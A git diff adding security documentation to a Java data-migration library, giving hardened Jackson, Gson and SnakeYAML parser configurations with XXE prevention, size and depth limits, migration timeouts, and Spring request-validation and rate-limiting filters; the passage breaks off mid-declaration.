+```java
+// Parse untrusted JSON
+byte[] untrustedJson = request.getBodyAsBytes();
+Dynamic dynamic = SecureJacksonJsonConfig.parseSecurely(untrustedJson);
+
+// Migrate
+TaggedDynamic tagged = new TaggedDynamic<>(TypeReferences.CONFIG, dynamic);
+TaggedDynamic result = fixer.update(tagged, fromVersion, toVersion);
+```
+
+---
+
+## Jackson XML Secure Configuration (XXE Prevention)
+
+### Basic Secure Setup
+
+```java
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.databind.JsonNode;
+import com.fasterxml.jackson.dataformat.xml.XmlFactory;
+import com.fasterxml.jackson.dataformat.xml.XmlMapper;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.codec.xml.jackson.JacksonXmlOps;
+
+import javax.xml.stream.XMLInputFactory;
+
+public class SecureJacksonXmlConfig {
+
+ /**
+ * Creates a secure XmlMapper with XXE prevention.
+ */
+ public static XmlMapper createSecureMapper() {
+ // Configure secure XMLInputFactory
+ XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory();
+
+ // Disable external entities (XXE prevention)
+ xmlInputFactory.setProperty(
+ XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
+
+ // Disable DTD processing
+ xmlInputFactory.setProperty(
+ XMLInputFactory.SUPPORT_DTD, false);
+
+ // Disable entity replacement
+ xmlInputFactory.setProperty(
+ XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
+
+ // Configure read constraints
+ StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50)
+ .maxStringLength(1_000_000)
+ .build();
+
+ // Build secure factory
+ XmlFactory factory = XmlFactory.builder()
+ .xmlInputFactory(xmlInputFactory)
+ .streamReadConstraints(constraints)
+ .build();
+
+ return XmlMapper.builder(factory).build();
+ }
+
+ /**
+ * Creates secure JacksonXmlOps instance.
+ */
+ public static JacksonXmlOps createSecureOps() {
+ return new JacksonXmlOps(createSecureMapper());
+ }
+
+ /**
+ * Parses untrusted XML securely and returns a Dynamic.
+ */
+ public static Dynamic parseSecurely(String xml) throws Exception {
+ XmlMapper mapper = createSecureMapper();
+ JsonNode node = mapper.readTree(xml);
+ return new Dynamic<>(new JacksonXmlOps(mapper), node);
+ }
+}
+```
+
+### Usage Example
+
+```java
+// Parse untrusted XML
+String untrustedXml = request.getBody();
+Dynamic dynamic = SecureJacksonXmlConfig.parseSecurely(untrustedXml);
+
+// Migrate
+TaggedDynamic tagged = new TaggedDynamic<>(TypeReferences.SETTINGS, dynamic);
+TaggedDynamic result = fixer.update(tagged, fromVersion, toVersion);
+```
+
+---
+
+## Jackson YAML Secure Configuration
+
+### Basic Secure Setup
+
+```java
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.databind.JsonNode;
+import com.fasterxml.jackson.dataformat.yaml.YAMLFactory;
+import com.fasterxml.jackson.dataformat.yaml.YAMLMapper;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.codec.yaml.jackson.JacksonYamlOps;
+
+public class SecureJacksonYamlConfig {
+
+ /**
+ * Creates a secure YAMLMapper for parsing untrusted input.
+ */
+ public static YAMLMapper createSecureMapper() {
+ StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50)
+ .maxStringLength(1_000_000)
+ .build();
+
+ YAMLFactory factory = YAMLFactory.builder()
+ .streamReadConstraints(constraints)
+ .build();
+
+ return new YAMLMapper(factory);
+ }
+
+ /**
+ * Creates secure JacksonYamlOps instance.
+ */
+ public static JacksonYamlOps createSecureOps() {
+ return new JacksonYamlOps(createSecureMapper());
+ }
+
+ /**
+ * Parses untrusted YAML securely and returns a Dynamic.
+ */
+ public static Dynamic parseSecurely(String yaml) throws Exception {
+ YAMLMapper mapper = createSecureMapper();
+ JsonNode node = mapper.readTree(yaml);
+ return new Dynamic<>(new JacksonYamlOps(mapper), node);
+ }
+}
+```
+
+---
+
+## Gson Secure Configuration
+
+### Basic Secure Setup with Validation
+
+```java
+import com.google.gson.Gson;
+import com.google.gson.GsonBuilder;
+import com.google.gson.JsonElement;
+import com.google.gson.JsonParser;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
+
+public class SecureGsonConfig {
+
+ private static final long MAX_SIZE = 10 * 1024 * 1024; // 10MB
+ private static final int MAX_DEPTH = 50;
+
+ /**
+ * Creates a Gson instance (safe by default).
+ */
+ public static Gson createGson() {
+ return new GsonBuilder()
+ .disableHtmlEscaping()
+ .create();
+ }
+
+ /**
+ * Parses untrusted JSON securely with size and depth validation.
+ */
+ public static Dynamic parseSecurely(String json) {
+ // Validate size
+ if (json.length() > MAX_SIZE) {
+ throw new SecurityException("JSON exceeds maximum size of " + MAX_SIZE);
+ }
+
+ // Parse
+ JsonElement element = JsonParser.parseString(json);
+
+ // Validate depth
+ validateDepth(element, 0);
+
+ return new Dynamic<>(GsonOps.INSTANCE, element);
+ }
+
+ private static void validateDepth(JsonElement element, int depth) {
+ if (depth > MAX_DEPTH) {
+ throw new SecurityException("JSON exceeds maximum depth of " + MAX_DEPTH);
+ }
+
+ if (element.isJsonObject()) {
+ element.getAsJsonObject().entrySet()
+ .forEach(e -> validateDepth(e.getValue(), depth + 1));
+ } else if (element.isJsonArray()) {
+ element.getAsJsonArray()
+ .forEach(e -> validateDepth(e, depth + 1));
+ }
+ }
+}
+```
+
+---
+
+## Complete Migration Service
+
+A complete service combining all security measures:
+
+```java
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.api.fix.AetherDataFixer;
+import de.splatgames.aether.datafixers.api.schema.DataVersion;
+import de.splatgames.aether.datafixers.api.type.TaggedDynamic;
+import de.splatgames.aether.datafixers.api.type.TypeReference;
+
+import java.time.Duration;
+import java.util.concurrent.*;
+
+public class SecureMigrationService {
+
+ private static final long MAX_PAYLOAD_SIZE = 10 * 1024 * 1024;
+ private static final Duration TIMEOUT = Duration.ofSeconds(30);
+
+ private final AetherDataFixer fixer;
+ private final ExecutorService executor;
+
+ public SecureMigrationService(AetherDataFixer fixer) {
+ this.fixer = fixer;
+        // Bounded pool: an unbounded cached pool would itself be a DoS vector
+        this.executor = Executors.newFixedThreadPool(
+                Runtime.getRuntime().availableProcessors());
+ }
+
+ /**
+ * Migrates untrusted JSON using Jackson.
+ */
+ public TaggedDynamic migrateJson(
+ byte[] untrustedJson,
+ TypeReference type,
+ DataVersion from,
+ DataVersion to) throws Exception {
+
+ validateSize(untrustedJson);
+ Dynamic dynamic = SecureJacksonJsonConfig.parseSecurely(untrustedJson);
+ return migrateWithTimeout(new TaggedDynamic<>(type, dynamic), from, to);
+ }
+
+ /**
+ * Migrates untrusted YAML using SnakeYAML.
+ */
+ public TaggedDynamic migrateYaml(
+ String untrustedYaml,
+ TypeReference type,
+ DataVersion from,
+ DataVersion to) throws Exception {
+
+ validateSize(untrustedYaml);
+ Dynamic dynamic = SecureSnakeYamlConfig.parseSecurely(untrustedYaml);
+ return migrateWithTimeout(new TaggedDynamic<>(type, dynamic), from, to);
+ }
+
+ /**
+ * Migrates untrusted XML using Jackson.
+ */
+ public TaggedDynamic migrateXml(
+ String untrustedXml,
+ TypeReference type,
+ DataVersion from,
+ DataVersion to) throws Exception {
+
+ validateSize(untrustedXml);
+ Dynamic dynamic = SecureJacksonXmlConfig.parseSecurely(untrustedXml);
+ return migrateWithTimeout(new TaggedDynamic<>(type, dynamic), from, to);
+ }
+
+ private void validateSize(byte[] data) {
+ if (data.length > MAX_PAYLOAD_SIZE) {
+ throw new PayloadTooLargeException(
+ "Payload exceeds maximum size of " + MAX_PAYLOAD_SIZE);
+ }
+ }
+
+ private void validateSize(String data) {
+ if (data.length() > MAX_PAYLOAD_SIZE) {
+ throw new PayloadTooLargeException(
+ "Payload exceeds maximum size of " + MAX_PAYLOAD_SIZE);
+ }
+ }
+
+ private TaggedDynamic migrateWithTimeout(
+ TaggedDynamic input,
+ DataVersion from,
+ DataVersion to) throws Exception {
+
+        Future<TaggedDynamic> future = executor.submit(
+ () -> fixer.update(input, from, to)
+ );
+
+ try {
+ return future.get(TIMEOUT.toMillis(), TimeUnit.MILLISECONDS);
+ } catch (TimeoutException e) {
+ future.cancel(true);
+ throw new MigrationTimeoutException("Migration timed out after " + TIMEOUT, e);
+ } catch (ExecutionException e) {
+ throw new MigrationException("Migration failed", e.getCause());
+ }
+ }
+
+ public void shutdown() {
+ executor.shutdown();
+ }
+}
+```
+
+### Usage
+
+```java
+SecureMigrationService service = new SecureMigrationService(fixer);
+
+// Migrate JSON
+TaggedDynamic result = service.migrateJson(
+ jsonBytes,
+ TypeReferences.PLAYER,
+ new DataVersion(100),
+ new DataVersion(200)
+);
+
+// Migrate YAML
+TaggedDynamic yamlResult = service.migrateYaml(
+ yamlString,
+ TypeReferences.CONFIG,
+ new DataVersion(1),
+ new DataVersion(5)
+);
+
+// Migrate XML
+TaggedDynamic xmlResult = service.migrateXml(
+ xmlString,
+ TypeReferences.SETTINGS,
+ new DataVersion(1),
+ new DataVersion(3)
+);
+```
+
+---
+
+## Exception Classes
+
+```java
+public class PayloadTooLargeException extends SecurityException {
+ public PayloadTooLargeException(String message) {
+ super(message);
+ }
+}
+
+public class MigrationTimeoutException extends RuntimeException {
+ public MigrationTimeoutException(String message, Throwable cause) {
+ super(message, cause);
+ }
+}
+
+public class MigrationException extends RuntimeException {
+ public MigrationException(String message, Throwable cause) {
+ super(message, cause);
+ }
+}
+```
+
+---
+
+## Related
+
+- [Best Practices](best-practices.md)
+- [SnakeYAML Security](format-considerations/snakeyaml.md)
+- [Jackson Security](format-considerations/jackson.md)
+- [Gson Security](format-considerations/gson.md)
+- [Spring Security Integration](spring-security-integration.md)
diff --git a/docs/security/spring-security-integration.md b/docs/security/spring-security-integration.md
new file mode 100644
index 0000000..87087fe
--- /dev/null
+++ b/docs/security/spring-security-integration.md
@@ -0,0 +1,649 @@
+# Spring Security Integration
+
+This guide covers integrating secure Aether Datafixers usage with Spring Boot and Spring Security.
+
+## Overview
+
+When using the `aether-datafixers-spring-boot-starter`, additional security measures should be implemented at the Spring level:
+
+1. **Secure Bean Configuration** — Configure secure parsers as Spring beans
+2. **Request Validation** — Validate payloads before they reach migration endpoints
+3. **Rate Limiting** — Prevent abuse of migration endpoints
+4. **Audit Logging** — Track migration attempts for security monitoring
+
+---
+
+## Secure Bean Configuration
+
+### Secure Parser Beans
+
+```java
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+import org.yaml.snakeyaml.LoaderOptions;
+import org.yaml.snakeyaml.Yaml;
+import org.yaml.snakeyaml.constructor.SafeConstructor;
+import com.fasterxml.jackson.databind.ObjectMapper;
+import com.fasterxml.jackson.core.JsonFactory;
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.dataformat.xml.XmlFactory;
+import com.fasterxml.jackson.dataformat.xml.XmlMapper;
+import javax.xml.stream.XMLInputFactory;
+
+@Configuration
+public class SecureDataFixerConfig {
+
+ @Bean
+ public Yaml secureYaml() {
+ LoaderOptions options = new LoaderOptions();
+ options.setMaxAliasesForCollections(50);
+ options.setNestingDepthLimit(50);
+ options.setCodePointLimit(3 * 1024 * 1024);
+ options.setAllowDuplicateKeys(false);
+ return new Yaml(new SafeConstructor(options));
+ }
+
+ @Bean
+ public ObjectMapper secureJsonMapper() {
+ StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50)
+ .maxNumberLength(100)
+ .maxStringLength(1_000_000)
+ .build();
+
+ JsonFactory factory = JsonFactory.builder()
+ .streamReadConstraints(constraints)
+ .build();
+
+ return new ObjectMapper(factory);
+ }
+
+ @Bean
+ public XmlMapper secureXmlMapper() {
+ XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory();
+ xmlInputFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
+ xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
+
+ StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50)
+ .maxStringLength(1_000_000)
+ .build();
+
+ XmlFactory factory = XmlFactory.builder()
+ .xmlInputFactory(xmlInputFactory)
+ .streamReadConstraints(constraints)
+ .build();
+
+ return XmlMapper.builder(factory).build();
+ }
+}
+```
+
+### Secure DynamicOps Beans
+
+```java
+import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;
+import de.splatgames.aether.datafixers.codec.xml.jackson.JacksonXmlOps;
+
+@Configuration
+public class SecureDynamicOpsConfig {
+
+ @Bean
+ public JacksonJsonOps secureJsonOps(ObjectMapper secureJsonMapper) {
+ return new JacksonJsonOps(secureJsonMapper);
+ }
+
+ @Bean
+ public JacksonXmlOps secureXmlOps(XmlMapper secureXmlMapper) {
+ return new JacksonXmlOps(secureXmlMapper);
+ }
+}
+```
+
+---
+
+## Request Validation Filter
+
+### Payload Size Validation
+
+```java
+import jakarta.servlet.FilterChain;
+import jakarta.servlet.ServletException;
+import jakarta.servlet.http.HttpServletRequest;
+import jakarta.servlet.http.HttpServletResponse;
+import org.springframework.core.Ordered;
+import org.springframework.core.annotation.Order;
+import org.springframework.http.HttpStatus;
+import org.springframework.stereotype.Component;
+import org.springframework.web.filter.OncePerRequestFilter;
+
+import java.io.IOException;
+
+@Component
+@Order(Ordered.HIGHEST_PRECEDENCE)
+public class PayloadSizeValidationFilter extends OncePerRequestFilter {
+
+ private static final long MAX_PAYLOAD_SIZE = 10 * 1024 * 1024; // 10MB
+
+ @Override
+ protected void doFilterInternal(
+ HttpServletRequest request,
+ HttpServletResponse response,
+ FilterChain chain) throws ServletException, IOException {
+
+        // Check Content-Length header. Note: getContentLengthLong() returns -1
+        // for chunked requests, which bypass this check — ensure the server's
+        // global request-size limit is also configured.
+        long contentLength = request.getContentLengthLong();
+        if (contentLength > MAX_PAYLOAD_SIZE) {
+ response.setStatus(HttpStatus.PAYLOAD_TOO_LARGE.value());
+ response.getWriter().write("Payload exceeds maximum size");
+ return;
+ }
+
+ chain.doFilter(request, response);
+ }
+
+ @Override
+ protected boolean shouldNotFilter(HttpServletRequest request) {
+ // Only filter migration endpoints
+ return !request.getRequestURI().startsWith("/api/migrate");
+ }
+}
+```
+
+### Content-Type Validation
+
+```java
+import org.springframework.http.MediaType;
+
+import java.util.Set;
+
+@Component
+@Order(Ordered.HIGHEST_PRECEDENCE + 1)
+public class ContentTypeValidationFilter extends OncePerRequestFilter {
+
+ private static final Set ALLOWED_CONTENT_TYPES = Set.of(
+ MediaType.APPLICATION_JSON_VALUE,
+ "application/yaml",
+ "text/yaml",
+ MediaType.APPLICATION_XML_VALUE,
+ MediaType.TEXT_XML_VALUE
+ );
+
+ @Override
+ protected void doFilterInternal(
+ HttpServletRequest request,
+ HttpServletResponse response,
+ FilterChain chain) throws ServletException, IOException {
+
+ String contentType = request.getContentType();
+ if (contentType != null) {
+ String baseType = contentType.split(";")[0].trim().toLowerCase();
+ if (!ALLOWED_CONTENT_TYPES.contains(baseType)) {
+ response.setStatus(HttpStatus.UNSUPPORTED_MEDIA_TYPE.value());
+ response.getWriter().write("Unsupported content type");
+ return;
+ }
+ }
+
+ chain.doFilter(request, response);
+ }
+
+ @Override
+ protected boolean shouldNotFilter(HttpServletRequest request) {
+ return !request.getRequestURI().startsWith("/api/migrate") ||
+ !"POST".equalsIgnoreCase(request.getMethod());
+ }
+}
+```
+
+---
+
+## Rate Limiting
+
+### Using Resilience4j
+
+Add dependency:
+
+```xml
+
+ io.github.resilience4j
+ resilience4j-spring-boot3
+ 2.2.0
+
+```
+
+Configuration:
+
+```yaml
+# application.yml
+resilience4j:
+ ratelimiter:
+ instances:
+ migration:
+ limitForPeriod: 10
+ limitRefreshPeriod: 1s
+ timeoutDuration: 0
+```
+
+Controller:
+
+```java
+import io.github.resilience4j.ratelimiter.annotation.RateLimiter;
+
+@RestController
+@RequestMapping("/api/migrate")
+public class MigrationController {
+
+ private final MigrationService migrationService;
+
+ public MigrationController(MigrationService migrationService) {
+ this.migrationService = migrationService;
+ }
+
+ @PostMapping("/json")
+ @RateLimiter(name = "migration", fallbackMethod = "rateLimitFallback")
+ public ResponseEntity migrateJson(
+ @RequestBody byte[] data,
+ @RequestParam int fromVersion,
+ @RequestParam int toVersion,
+ @RequestParam String type) {
+
+ MigrationResult result = migrationService
+ .migrate(data)
+ .from(fromVersion)
+ .to(toVersion)
+ .execute();
+
+ return ResponseEntity.ok(result);
+ }
+
+ public ResponseEntity rateLimitFallback(
+ byte[] data, int fromVersion, int toVersion, String type, Throwable t) {
+ return ResponseEntity.status(HttpStatus.TOO_MANY_REQUESTS)
+ .body(MigrationResult.error("Rate limit exceeded. Please try again later."));
+ }
+}
+```
+
+### Using Bucket4j
+
+```java
+import io.github.bucket4j.Bandwidth;
+import io.github.bucket4j.Bucket;
+import io.github.bucket4j.Refill;
+
+@Component
+public class RateLimitingService {
+
+ private final Map